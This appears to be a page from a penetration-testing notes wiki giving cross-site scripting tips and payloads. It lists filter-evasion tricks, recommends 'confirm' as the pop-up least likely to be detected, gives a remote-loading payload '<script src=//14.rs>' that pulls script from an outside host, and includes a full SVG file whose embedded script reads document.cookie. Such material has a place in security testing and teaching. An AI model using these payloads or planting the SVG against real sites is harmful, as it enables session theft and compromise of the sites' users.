XSS Tricks/Bypasses

Tips

  • http(s):// can be shortened to // or /\\ or \\.

  • document.cookie can be shortened to cookie. It applies to other DOM objects as well.

  • alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()

  • You can use // to close a tag instead of >.

  • I have found that confirm is the least detected pop-up function so stop using alert.

  • Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">

  • The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)

XSS inside SVG file

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
	<script type="text/javascript">
		alert(document.cookie);
	</script>
</svg>

Nice payloads/bypasses

PreviousWAF BypassesNextLocal File Inclusion (LFI)

Last updated